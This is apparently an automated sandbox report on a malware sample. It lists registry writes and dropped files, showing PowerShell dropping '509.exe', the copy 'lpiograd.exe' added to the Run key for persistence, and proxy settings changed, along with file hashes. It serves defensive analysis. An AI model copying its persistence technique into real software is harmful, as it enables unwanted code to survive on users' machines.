1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1580
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1580
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
EnableFileTracing
0
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
EnableConsoleTracing
0
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
FileTracingMask
4294901760
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
ConsoleTracingMask
4294901760
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
MaxFileSize
1048576
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASAPI32
FileDirectory
%windir%\tracing
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
EnableFileTracing
0
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
EnableConsoleTracing
0
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
FileTracingMask
4294901760
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
ConsoleTracingMask
4294901760
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
MaxFileSize
1048576
2036
lpiograd.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lpiograd_RASMANCS
FileDirectory
%windir%\tracing
2036
lpiograd.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2036
lpiograd.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2036
lpiograd.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
lpiograd
"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"
3516
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
3516
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency
3516
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018082720180903
3516
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018090920180910
3516
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\MessageMap\1:WINWORD
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3516
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661510
3516
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ClviewFilesIntl_1033
1298661377
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
eq'
65712700BC0D0000010000000000000000000000
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTT
BC0D0000A6FA8B1A7A77D40100000000
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\MessageMap\1:WINWORD
C2010500
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018110820181109
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018110820181109
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018110820181109
CachePrefix
:2018110820181109:
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018110820181109
CacheLimit
8192
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018110820181109
CacheOptions
11
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018110820181109
CacheRepair
0
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Left
427
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Top
58
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Width
425
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Height
575
3516
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661511
3516
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661512
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTF
2
3516
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTA
2
1996
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
1996
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency
1996
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\MessageMap\1:WINWORD
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1996
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661513
1996
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ClviewFilesIntl_1033
1298661378
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
`{"
607B2200CC070000010000000000000000000000
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTT
CC0700007341AE1C7A77D40100000000
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\MessageMap\1:WINWORD
AE010500
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Left
427
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Top
58
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Width
425
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\Applications\WINWORD
Height
575
1996
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661514
1996
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661515
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTF
3
1996
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTA
3
1880
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
1880
CLVIEW.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1880
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661516
1880
CLVIEW.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ClviewFilesIntl_1033
1298661379
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\CLView\Resiliency\StartupItems
$q=
24713D0058070000010000000000000000000000
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer
CLViewMTTT
580700001DA8BE217A77D40100000000
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1880
CLVIEW.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\HelpViewer\MessageMap\1:WINWORD
3A010600

Files activity

Executable files
2
Suspicious files
6
Text files
150
Unknown types
3

Dropped files

PID
Process
Filename
Type
3980
509.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
executable
MD5: 6823e6e9a4321cfda0767502921358e3
SHA256: 63b0ecc943fce32c509e12af374918b7d0c9c65663f5b2e100facc2faee1dc81
1580
powershell.exe
C:\Users\admin\AppData\Local\Temp\509.exe
executable
MD5: 6823e6e9a4321cfda0767502921358e3
SHA256: 63b0ecc943fce32c509e12af374918b7d0c9c65663f5b2e100facc2faee1dc81
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\search[1].xsl
xml
MD5: 94574c45fb7908aa78702728d51ca4b3
SHA256: 13a507594749624c1db987ed7148b5a8ae75666b0a54ef9eaf875597e44e2265
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\back2.gif
image
MD5: 3e0b845d2f15589538b84fa5f3eeca9f
SHA256: 25a8c6f761aef8378b470f420035b03362ba4d6761264969d506d8db288b9fd8
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\errexcl.gif
image
MD5: 9455f749e6a5eecc8a69067f91f9066f
SHA256: ef8dcfc6cadabb2eeed276034ae253f3be651ab73bd8bc9039300ea16cc73e62
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\help.gif
image
MD5: fca4caf9ca84107ca5bb207e4abfed0c
SHA256: 88451b88037c920e3c79b61d835687fca63c9a07fc44644fe5068b20d91b7f2a
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\helpid.xsl
xml
MD5: d80d85131913452aa40de729acfe41d1
SHA256: 19f8d955ff19b356d55be12d7c71dfc8b5105302472f8fba7ccb158b13af339a
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\logo.gif
image
MD5: fb0dcad6d2967876a6176446726210d9
SHA256: 4f8b829ab7d1b65f9533c50e95f277283b604f1924d4deaac6ad10906788ab0c
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\message.xsl
xml
MD5: 3cd6a3b27d59d49440d1be68af38e14c
SHA256: 8b847a3c27a450ffa78f23fc152d0040efd60e0b873887c2217fd51670c8ce08
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\next.gif
image
MD5: 1dbc173789364e0c18a646d67bfb4a3c
SHA256: 1c48ab0770ad29146b5305f18eb3207d18faf62368ea4f18238dfe205f6ace23
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\next2.gif
image
MD5: 1a586c9b5fe5a58a3d6c86a63e64baef
SHA256: acca99d3ac329e36c2f8a9c19cf3e3b4594f6d86b6385eb1a376af73b24b8eb7
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\online.gif
image
MD5: 03313506c488bd93bae4bf9078fdc69e
SHA256: 94395510c9c773cf366874d4bcb8a2b8e347192e02cce9cc8b498c39e8d8e581
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\content.css
text
MD5: 7ed65d8078c0dccac3e54bea090394ce
SHA256: 889bce80f4b3f32389cd76c9073ac682db2ef7f5d2981cdbb85c72154a04a844
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\Office12.js
text
MD5: 5ef7364647d148ca222e947d70ecc341
SHA256: eb0f0a1184f9437b9a1cb1dfa14d8d28d343f7c2cd2b2ce4bd818373ea3ad7e4
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\search.xsl
xml
MD5: 94574c45fb7908aa78702728d51ca4b3
SHA256: 13a507594749624c1db987ed7148b5a8ae75666b0a54ef9eaf875597e44e2265
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\tbgradient.gif
image
MD5: e577f384f3be48606eb24de490ef7470
SHA256: dce6c88acc7db94066218d591568e2c01f5460ae3d749fe0ea2f5cb18b508e39
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\toc.xsl
xml
MD5: 26de67342be3c52d20d0c152fae1f843
SHA256: 5e65cb6e32a25b91b80b19317d93d76ce5222b565f8f495a01149e82a90beef7
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\ont.css
text
MD5: 10e040bce37fdb924886805eb78faef6
SHA256: 197478a22616fea54e6f20323facc28084ee7a3495bb2fe0669ebc3a6948c7aa
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\script.js
text
MD5: e72eebc1eb449513d28447f352406330
SHA256: e78f14923030e2e817fab024e72482d72aa14f3dcaef66f3a2c6825d6a29b305
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\contentHXS.css
text
MD5: 3dd88748d642732883bd0f9009262482
SHA256: 93658d8161827e3b7c6839986fb1e051da7a00a93de0bb5942b490973f5bec8a
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\clvtitlebg.gif
image
MD5: e99ebd19aca961126a7991dffff33f31
SHA256: 6d34432f68e973af539c5afcb87194ad2acbdf3cc4bc6f20458954662ff3ca03
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\clvbluebg.gif
image
MD5: 97d012557e39e76fdcc67f1b193b83d5
SHA256: 8d0fee06920d3cec3a073496d49b6bfd99bb6b22d748221f64e742935aba89cb
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\clvgraybg.gif
image
MD5: 1c2755961e32314ce6208921a25bca9b
SHA256: 39dbf2623931b0e690531baace75d890108ee81f6c95a872b0b1f9b27f3e8196
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\offlineclientviewer.xml
xml
MD5: 6602f1daef541d6eee3f2fe07e9fdc2a
SHA256: 37e4710d6a762194b9b6aa9b053bff5df90c05bb675002944510c725f428c661
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\offlineclientviewer.xsl
xml
MD5: 6173d86d395f0ea99aff338f8be58421
SHA256: d37c79c15a8c782eacbf4e7fca1646af7c42cfb235f198f68ce69df353f06a9b
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\clvImagePaneMedia.jpg
image
MD5: 98da261f629b05e637a715445ac87f3e
SHA256: 322ddbf086a222d8c13c862ec9891a7d4eb45f03b5dc8baa5f6b65923b350c19
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\cvglobal.xsl
xml
MD5: 048efa38358f297327024f7f90928ee5
SHA256: 9004e1b028764e0e482fb273c16649d3282be74e9212e6332be10b294eca3312
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\bullet.png
image
MD5: 647b27d7825531915bf109b8e2338fa0
SHA256: f23974592a4f5f7742471a13330c6b9b648c05cf8b38c4fd270c03ec2c876712
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\cvglobalstrings.xml
xml
MD5: 3548b520874395a9cbce22d15e9068d8
SHA256: 31f2fa759ed6862569f7c68aed874053ebcfb4e27c74476a0fd3aa1e3af818d6
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\page-lsd.png
image
MD5: 59cb6dd93db7b9bf6b2839b2204189e4
SHA256: 0014b20aaf60f6e8289ed2048df986e3130c64f3aa63ebbe08978b7814263be1
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\clv14titlebarbg.png
image
MD5: e1528816607c20d004f081ce0caa4de4
SHA256: 74a2750233670cf7a18201903dea1d9d2db38e1a31fee7f04f96467abc34ab28
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\page-rsh.png
image
MD5: a6426d2e1904574838be4f3b7e1ee900
SHA256: 2869275993df28609bb2148ef4debad1b483a82d23170bb1015e68ca772679f7
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\page-lsh.png
image
MD5: 097c14cc1ae33c7b834179534136438d
SHA256: d4909df5bf7dfe0cea1f83caacff9135549e7c18c669f7b275cfe56c42062ef7
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\page-rsd.png
image
MD5: 4ee71d30a4448209806d492e0500f015
SHA256: 49c3884026013ec0096c2233b3c5669491cb9e986ad3e61717bd8cb06e9a6a64
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\ontrtl.css
text
MD5: 40ffa4ddfb84e269b6e1df260a101346
SHA256: 8bf6ad48b445bf9badec45e765e10ed98eec74f6f70f23c8e34b5b290459ace4
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\LOCALHELP.TXT
text
MD5: 75a4845736220763a3b0e11b0e435ee1
SHA256: 7a54a17f7c898525312c52ba0472a829348dbbb9cf71a6da65f30675b67c4008
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\ClientViewerSettings.xml
xml
MD5: 88fbdbf0b8ed30038abb141e26ad42b6
SHA256: 63a2227b104139265e9d2f43e5e4c8c61aabcd92ffee838fbbe18e987e911c68
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft Help\MS.WINWORD.14.1033_1033_MValidator.Lck
text
MD5: b485167c5b0e59d47009a16f90fe2659
SHA256: db44b8db4f05d720ef1a57abadeed0c164d47b17416c7dd7d136d8f10fba91c9
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\back.gif
image
MD5: 5cf4fe788eab2fe10b0dbfd8fa99d9df
SHA256: 21f6f9e91fffa6a49ee14d778c71ca9e96dbd8ae73d8974947ed2c1242e4c38c
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\back2.gif
image
MD5: 3e0b845d2f15589538b84fa5f3eeca9f
SHA256: 25a8c6f761aef8378b470f420035b03362ba4d6761264969d506d8db288b9fd8
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\BROWSE0.WINWORD.xml
xml
MD5: c6b250833c801ff8337ab2ccaaf23408
SHA256: 0c4e4c2aac391920fcc5c10c222b448dd2d419dc79b56fec3a923f47b14b39f9
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\help.gif
image
MD5: fca4caf9ca84107ca5bb207e4abfed0c
SHA256: 88451b88037c920e3c79b61d835687fca63c9a07fc44644fe5068b20d91b7f2a
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\bulletl.gif
image
MD5: 9f9dd2eec107ffbafbcb68a305909024
SHA256: 1aeeb99732bd228eba7090192d57ab9ec437f61caf2dda53412f1b53ffd8992a
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\errexcl.gif
image
MD5: 9455f749e6a5eecc8a69067f91f9066f
SHA256: ef8dcfc6cadabb2eeed276034ae253f3be651ab73bd8bc9039300ea16cc73e62
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\helpid.xsl
xml
MD5: d80d85131913452aa40de729acfe41d1
SHA256: 19f8d955ff19b356d55be12d7c71dfc8b5105302472f8fba7ccb158b13af339a
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\logo.gif
image
MD5: fb0dcad6d2967876a6176446726210d9
SHA256: 4f8b829ab7d1b65f9533c50e95f277283b604f1924d4deaac6ad10906788ab0c
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\message.xsl
xml
MD5: 3cd6a3b27d59d49440d1be68af38e14c
SHA256: 8b847a3c27a450ffa78f23fc152d0040efd60e0b873887c2217fd51670c8ce08
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\next.gif
image
MD5: 1dbc173789364e0c18a646d67bfb4a3c
SHA256: 1c48ab0770ad29146b5305f18eb3207d18faf62368ea4f18238dfe205f6ace23
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\next2.gif
image
MD5: 1a586c9b5fe5a58a3d6c86a63e64baef
SHA256: acca99d3ac329e36c2f8a9c19cf3e3b4594f6d86b6385eb1a376af73b24b8eb7
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\Office12.js
text
MD5: 5ef7364647d148ca222e947d70ecc341
SHA256: eb0f0a1184f9437b9a1cb1dfa14d8d28d343f7c2cd2b2ce4bd818373ea3ad7e4
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\online.gif
image
MD5: 03313506c488bd93bae4bf9078fdc69e
SHA256: 94395510c9c773cf366874d4bcb8a2b8e347192e02cce9cc8b498c39e8d8e581
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\content.css
text
MD5: 7ed65d8078c0dccac3e54bea090394ce
SHA256: 889bce80f4b3f32389cd76c9073ac682db2ef7f5d2981cdbb85c72154a04a844
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\search.xsl
xml
MD5: 94574c45fb7908aa78702728d51ca4b3
SHA256: 13a507594749624c1db987ed7148b5a8ae75666b0a54ef9eaf875597e44e2265
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\toc.xsl
xml
MD5: 26de67342be3c52d20d0c152fae1f843
SHA256: 5e65cb6e32a25b91b80b19317d93d76ce5222b565f8f495a01149e82a90beef7
1996
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH102E.tmp\tbgradient.gif
image
MD5: e577f384f3be48606eb24de490ef7470
